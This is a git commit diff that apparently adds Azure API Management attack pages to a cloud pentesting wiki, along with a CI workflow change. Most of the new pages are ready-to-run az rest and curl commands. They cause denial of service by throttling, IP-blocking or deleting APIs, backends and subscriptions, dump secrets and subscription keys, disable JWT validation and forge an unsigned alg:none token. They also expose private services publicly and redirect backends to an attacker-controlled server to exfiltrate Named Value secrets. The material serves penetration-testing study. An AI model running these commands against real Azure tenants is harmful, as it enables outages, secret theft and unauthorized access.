Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud

carlospolop · carlospolop · commit ca809b9df118 · 2025-12-26T19:43:21.000+01:00
diff --git a/.github/workflows/upload_ht_to_ai.yml b/.github/workflows/upload_ht_to_ai.yml
@@ -20,4 +20,4 @@ jobs:
         
       # 2. Execute the script
       - name: Execute script
-        run: export MY_OPENAI_API_KEY=${{ secrets.MY_OPENAI_API_KEY }}; python3 "./upload_ht_to_ai.py"
+        run: export MY_OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY_UPLOAD_TO_OPENAI }}; python3 "./upload_ht_to_ai.py"
diff --git a/src/SUMMARY.md b/src/SUMMARY.md
@@ -460,6 +460,7 @@
   - [Az - Services](pentesting-cloud/azure-security/az-services/README.md)
     - [Az - Entra ID (AzureAD) & Azure IAM](pentesting-cloud/azure-security/az-services/az-azuread.md)
     - [Az - ACR](pentesting-cloud/azure-security/az-services/az-acr.md)
+    - [Az - API Management](pentesting-cloud/azure-security/az-services/az-api-management.md)
     - [Az - Application Proxy](pentesting-cloud/azure-security/az-services/az-application-proxy.md)
     - [Az - ARM Templates / Deployments](pentesting-cloud/azure-security/az-services/az-arm-templates.md)
     - [Az - Automation Accounts](pentesting-cloud/azure-security/az-services/az-automation-accounts.md)
@@ -507,6 +508,7 @@
     - [Az - PTA - Pass-through Authentication](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pta-pass-through-authentication.md)
     - [Az - Seamless SSO](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-seamless-sso.md)    
   - [Az - Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/README.md)
+    - [Az API Management Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-api-management-post-exploitation.md)
     - [Az Azure Ai Foundry Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-azure-ai-foundry-post-exploitation.md)
     - [Az - Blob Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md)
     - [Az - CosmosDB Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.md)
@@ -525,6 +527,7 @@
   - [Az - Privilege Escalation](pentesting-cloud/azure-security/az-privilege-escalation/README.md)
     - [Az - Azure IAM Privesc (Authorization)](pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md)
     - [Az - AI Foundry Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-ai-foundry-privesc.md)
+    - [Az - API Management Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-api-management-privesc.md)
     - [Az - App Services Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md)
     - [Az - Automation Accounts Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.md)
     - [Az - Container Registry Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-container-registry-privesc.md)
diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/az-api-management-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-api-management-post-exploitation.md
@@ -0,0 +1,89 @@
+# Azure - API Management Post-Exploitation
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+##  `Microsoft.ApiManagement/service/apis/policies/write` or `Microsoft.ApiManagement/service/policies/write`
+The attacker can use multiple vectors to cause a denial of service. To block legitimate traffic, the attacker adds rate-limiting and quota policies with extremely low values, effectively preventing normal access:
+
+```bash
+az rest --method PUT \
+    --uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/apis/<api-id>/policies/policy?api-version=2024-05-01" \
+    --headers "Content-Type=application/json" \
+    --body '{
+        "properties": {
+            "format": "rawxml",
+            "value": "<policies><inbound><rate-limit calls=\"1\" renewal-period=\"3600\" /><quota calls=\"10\" renewal-period=\"86400\" /><base /></inbound><backend><forward-request /></backend><outbound><base /></outbound></policies>"
+        }
+    }'
+```
+
+To block specific legitimate client IPs, the attacker can add IP filtering policies that reject requests from selected addresses:
+
+```bash
+az rest --method PUT \
+    --uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/apis/<api-id>/policies/policy?api-version=2024-05-01" \
+    --headers "Content-Type=application/json" \
+    --body '{
+        "properties": {
+            "format": "rawxml",
+            "value": "<policies><inbound><ip-filter action=\"forbid\"><address>1.2.3.4</address><address>1.2.3.5</address></ip-filter><base /></inbound><backend><forward-request /></backend><outbound><base /></outbound></policies>"
+        }
+    }'
+```
+
+## `Microsoft.ApiManagement/service/backends/write` or `Microsoft.ApiManagement/service/backends/delete`
+To cause requests to fail, the attacker can modify a backend configuration and change its URL to an invalid or unreachable address:
+
+```bash
+az rest --method PUT \
+    --uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends/<backend-id>?api-version=2024-05-01" \
+    --headers "Content-Type=application/json" "If-Match=*" \
+    --body '{
+        "properties": {
+            "url": "https://invalid-backend-that-does-not-exist.com",
+            "protocol": "http"
+        }
+    }'
+```
+
+Or delete backends:
+```bash
+az rest --method DELETE \
+    --uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends/<backend-id>?api-version=2024-05-01" \
+    --headers "If-Match=*"
+```
+
+## `Microsoft.ApiManagement/service/apis/delete`
+To make critical APIs unavailable, the attacker can delete them directly from the API Management service:
+
+```bash
+az rest --method DELETE \
+    --uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/apis/<api-id>?api-version=2024-05-01" \
+    --headers "If-Match=*"
+```
+
+## `Microsoft.ApiManagement/service/write` or `Microsoft.ApiManagement/service/applynetworkconfigurationupdates/action`
+To block access from the Internet, the attacker can disable public network access on the API Management service:
+
+```bash
+az rest --method PATCH \
+    --uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>?api-version=2024-05-01" \
+    --headers "Content-Type=application/json" \
+    --body '{
+        "properties": {
+            "publicNetworkAccess": "Disabled"
+        }
+    }'
+```
+
+## `Microsoft.ApiManagement/service/subscriptions/delete`
+To block access for legitimate users, the attacker can delete API Management subscriptions:
+
+```bash
+az rest --method DELETE \
+    --uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/subscriptions/<apim-subscription-id>?api-version=2024-05-01" \
+    --headers "If-Match=*"
+```
+
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-api-management-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-api-management-privesc.md
@@ -0,0 +1,202 @@
+# Az - API Management Privesc
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## `Microsoft.ApiManagement/service/namedValues/read` & `Microsoft.ApiManagement/service/namedValues/listValue/action`
+
+The attack consists of accessing sensitive secrets stored in Azure API Management Named Values, either by directly retrieving secret values or by abusing permissions to obtain Key Vault–backed secrets through managed identities.
+
+```bash
+az apim nv show-secret --resource-group <resource-group> --service-name <service-name> --named-value-id <named-value-id>
+```
+
+## `Microsoft.ApiManagement/service/subscriptions/read` & `Microsoft.ApiManagement/service/subscriptions/listSecrets/action`
+For each subscription, the attacker can obtain the subscription keys by using the listSecrets endpoint with the POST method:
+
+```bash
+az rest --method POST \
+    --uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/subscriptions/<subscription-sid>/listSecrets?api-version=2024-05-01"
+```
+
+The response includes the subscription primary key (primaryKey) and secondary key (secondaryKey). With these keys, the attacker can authenticate and access the APIs published through the API Management Gateway:
+
+```bash
+curl -H "Ocp-Apim-Subscription-Key: <primary-key-or-secondary-key>" \
+     https://<service-name>.azure-api.net/<api-path>
+```
+
+The attacker can access all APIs and products associated with the subscription. If the subscription has access to sensitive products or APIs, the attacker may obtain confidential information or perform unauthorized operations.
+
+## `Microsoft.ApiManagement/service/policies/write` or `Microsoft.ApiManagement/service/apis/policies/write`
+
+The attacker first retrieves the current API policy:
+
+```bash
+az rest --method GET \
+    --uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/apis/<api-id>/policies/?api-version=2024-05-01&format=rawxml"
+```
+
+The attacker can modify the policy in multiple ways depending on their objectives. For example, to disable authentication, if the policy includes JWT token validation, the attacker can remove or comment out that section:
+
+```xml
+<policies>
+    <inbound>
+        <base />
+        <!-- JWT validation removed by the attacker -->
+        <!-- <validate-jwt header-name="Authorization" failed-validation-httpcode="401" >
+            ...
+        </validate-jwt> -->
+    </inbound>
+    <backend>
+        <base />
+    </backend>
+    <outbound>
+        <base />
+    </outbound>
+    <on-error>
+        <base />
+    </on-error>
+</policies>
+```
+
+To remove rate limiting controls and allow denial-of-service attacks, the attacker can remove or comment out quota and rate-limit policies:
+
+```xml
+<policies>
+    <inbound>
+        <base />
+        <!-- Rate limiting removed by the attacker -->
+        <!-- <rate-limit calls="100" renewal-period="60" />
+        <quota-by-key calls="1000" renewal-period="3600" counter-key="@(context.Subscription.Id)" /> -->
+    </inbound>
+    ...
+</policies>
+```
+
+To modify the backend route and redirect traffic to an attacker-controlled server:
+
+```xml
+<policies>
+    ...
+    <inbound>
+        <base />
+        <set-backend-service base-url="https://attacker-controlled-server.com" />
+    </inbound>
+    ...
+</policies>
+```
+
+The attacker then applies the modified policy. The request body must be a JSON object containing the policy in XML format:
+
+```bash
+az rest --method PUT \
+    --uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/apis/<api-id>/policies/policy?api-version=2024-05-01" \
+    --headers "Content-Type=application/json" \
+    --body '{
+        "properties": {
+            "format": "rawxml",
+            "value": "<policies><inbound><base /></inbound><backend><base /></backend><outbound><base /></outbound><on-error><base /></on-error></policies>"
+        }
+    }'
+```
+
+## JWT Validation Misconfiguration
+
+The attacker needs to know that an API uses JWT token validation and that the policy is misconfigured. Poorly configured JWT validation policies may have `require-signed-tokens="false"` or `require-expiration-time="false"`, which allows the service to accept unsigned tokens or tokens that never expire.
+
+The attacker creates a malicious JWT token using the none algorithm (unsigned):
+
+```
+# Header: {"alg":"none"}
+# Payload: {"sub":"user"}
+eyJhbGciOiJub25lIn0.eyJzdWIiOiJ1c2VyIn0.
+```
+
+The attacker sends a request to the API using the malicious token:
+
+```bash
+curl -X GET \
+    -H "Authorization: Bearer eyJhbGciOiJub25lIn0.eyJzdWIiOiJ1c2VyIn0." \
+    https://<apim>.azure-api.net/path
+```
+
+If the policy is misconfigured with `require-signed-tokens="false"`, the service will accept the unsigned token. The attacker can also create a token without an expiration claim if `require-expiration-time="false"`.
+
+## `Microsoft.ApiManagement/service/applynetworkconfigurationupdates/action`
+The attacker first checks the current network configuration of the service:
+
+```bash
+az rest --method GET \
+    --uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<apim>?api-version=2024-05-01"
+```
+
+The attacker reviews the JSON response to verify the values of `publicNetworkAccess` and `virtualNetworkType`. If `publicNetworkAccess` is set to false or `virtualNetworkType` is set to Internal, the service is configured for private access.
+
+To expose the service to the Internet, the attacker must change both settings. If the service is running in internal mode (`virtualNetworkType: "Internal"`), the attacker changes it to None or External and enables public network access. This can be done using the Azure Management API:
+
+```bash
+az rest --method PATCH \
+    --uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<apim>?api-version=2024-05-01" \
+    --headers "Content-Type=application/json" \
+    --body '{
+        "properties": {
+            "publicNetworkAccess": "Enabled",
+            "virtualNetworkType": "None"
+        }
+    }'
+```
+
+Once `virtualNetworkType` is set to `None` or `External` and `publicNetworkAccess` is enabled, the service and all its APIs become accessible from the Internet, even if they were previously protected behind a private network or private endpoints.
+
+## `Microsoft.ApiManagement/service/backends/write`
+The attacker first enumerates the existing backends to identify which one to modify:
+
+```bash
+az rest --method GET \
+    --uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends?api-version=2024-05-01"
+```
+
+The attacker retrieves the current configuration of the backend they want to modify:
+
+```bash
+az rest --method GET \
+    --uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends/<backend-id>?api-version=2024-05-01"
+```
+
+The attacker modifies the backend URL to point to a server under their control. First, they obtain the ETag from the previous response and then update the backend:
+
+```bash
+az rest --method PUT \
+    --uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends/<backend-id>?api-version=2024-05-01" \
+    --headers "Content-Type=application/json" "If-Match=*" \
+    --body '{
+        "properties": {
+            "url": "https://attacker-controlled-server.com",
+            "protocol": "http",
+            "description": "Backend modified by attacker"
+        }
+    }'
+```
+
+Alternatively, the attacker can configure backend headers to exfiltrate Named Values containing secrets. This is done through the backend credentials configuration:
+
+```bash
+az rest --method PUT \
+    --uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends/<backend-id>?api-version=2024-05-01" \
+    --headers "Content-Type=application/json" "If-Match=*" \
+    --body '{
+        "properties": {
+            "url": "https://attacker-controlled-server.com",
+            "protocol": "http",
+            "credentials": {
+                "header": {
+                    "X-Secret-Value": ["{{named-value-secret}}"]
+                }
+            }
+        }
+    }'
+```
+
+With this configuration, Named Values are sent as headers in all requests to the attacker-controlled backend, enabling the exfiltration of sensitive secrets.
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/azure-security/az-services/az-api-management.md b/src/pentesting-cloud/azure-security/az-services/az-api-management.md
